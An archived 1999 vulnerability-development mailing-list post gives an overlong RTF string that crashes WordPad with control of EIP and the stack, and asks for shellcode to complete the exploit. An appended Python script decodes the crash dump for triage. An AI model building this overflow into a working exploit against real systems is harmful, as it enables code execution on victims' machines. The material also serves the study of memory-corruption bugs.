Vulnerability Development mailing list archives

Re: development of wordpad exploit


From: jepaulson () BANENG COM (Jason Paulson)
Date: Fri, 19 Nov 1999 10:56:29 -0600


I am also interested in learning, and I have a small donation to make.
I don't know the opcodes for an Intel processor, but I have control of the
stack. So if some Assembly guru will fill in the empty space with some
interesting opcodes, I think we are in business.

The following contents of an RTF document (probably wrapped; should all be
one line):

{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNOPQRSTUVWXYZ0AAB
BCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZAAABBBCCCDDDEEEFFFGGGHHHIII
JJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAAABBBBCCCCDDDDEEEEFFFFG
GGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZ
ZZZAAAAABBBBBCCCCCDDDDDEEEEEFFFFFGGGGGHHHHHIIIIIJJJJJKKKKKLLLLLMMMMMNNNNNOOO
OOPPPPPQQQQQRRRRRSSSSSTTTTTUUUUUVVVVVWWWWWXXXXXYYYYYZZZZZ}

will cause the following dump:

WORDPAD caused an invalid page fault in
module <unknown> at 00de:41414141.
Registers:
EAX=00000102 CS=017f EIP=41414141 EFLGS=00010212
EBX=0056e364 SS=0187 ESP=0056e324 EBP=00000409
ECX=0056e364 DS=0187 ESI=0056e364 FS=57a7
EDX=fffffff3 ES=0187 EDI=0056e418 GS=609e
Bytes at CS:EIP:

Stack dump:
44434241 48474645 4c4b4a49 504f4e4d 54535251 58575655 00005a59 00500f1c
00000000 00000000 00000000 00500e90 480268ad 00500f40 00500e90 80000002

Notice that we control EIP (41414141, all As), and the first part of the
stack is also under our control (44434241 48474645 = DCBA HGFE). This is
reversed because of the way the i386 architecture stores memory pointers.

Cheers,

Jason
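
Added example (not part of Jason's post): a small Python crash-triage helper that parses the register and stack lines from the dump above and lays each 32-bit word out in i386 byte order, confirming that EIP and the leading stack words are made of the input pattern. The dump text is copied from the post; the function names are this example's own.

```python
import re
import struct

# Register and stack lines from the crash report posted in the thread, copied
# here so the script runs offline.
CRASH_DUMP = """\
Registers:
EAX=00000102 CS=017f EIP=41414141 EFLGS=00010212
EBX=0056e364 SS=0187 ESP=0056e324 EBP=00000409
ECX=0056e364 DS=0187 ESI=0056e364 FS=57a7
EDX=fffffff3 ES=0187 EDI=0056e418 GS=609e
Stack dump:
44434241 48474645 4c4b4a49 504f4e4d 54535251 58575655 00005a59 00500f1c
00000000 00000000 00000000 00500e90 480268ad 00500f40 00500e90 80000002
"""

def parse_registers(dump):
    """Collect NAME=hex pairs from the Registers block into a dict of ints."""
    return {m.group(1): int(m.group(2), 16)
            for m in re.finditer(r"\b([A-Z]{2,5})=([0-9a-fA-F]{4,8})\b", dump)}

def parse_stack(dump):
    """Return the 32-bit words printed after 'Stack dump:' in the order shown."""
    body = dump.split("Stack dump:", 1)[1]
    return [int(w, 16) for w in re.findall(r"\b[0-9a-fA-F]{8}\b", body)]

def word_to_memory_bytes(word):
    """Lay a 32-bit value out as the i386 stores it: least significant byte first."""
    return struct.pack("<I", word)

def as_text(raw):
    """Render bytes as ASCII, with non-printables shown as '.' like a hex viewer."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in raw)

def controlled_prefix(words):
    """Input bytes recovered from the top of the stack, up to the first non-ASCII byte."""
    raw = b"".join(word_to_memory_bytes(w) for w in words)
    for i, b in enumerate(raw):
        if not 0x20 <= b < 0x7F:
            return raw[:i]
    return raw

def triage(dump):
    """Summarise which crash fields are made of input bytes."""
    regs, stack = parse_registers(dump), parse_stack(dump)
    return {"eip": regs["EIP"],
            "eip_as_input": as_text(word_to_memory_bytes(regs["EIP"])),
            "stack_prefix": controlled_prefix(stack).decode("ascii")}

if __name__ == "__main__":
    print(triage(CRASH_DUMP))
```

Reading the words in memory order is what turns "44434241 48474645" into "ABCDEFGH": the dump prints each word most-significant byte first, while the bytes sat in memory in the order they appeared in the input.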

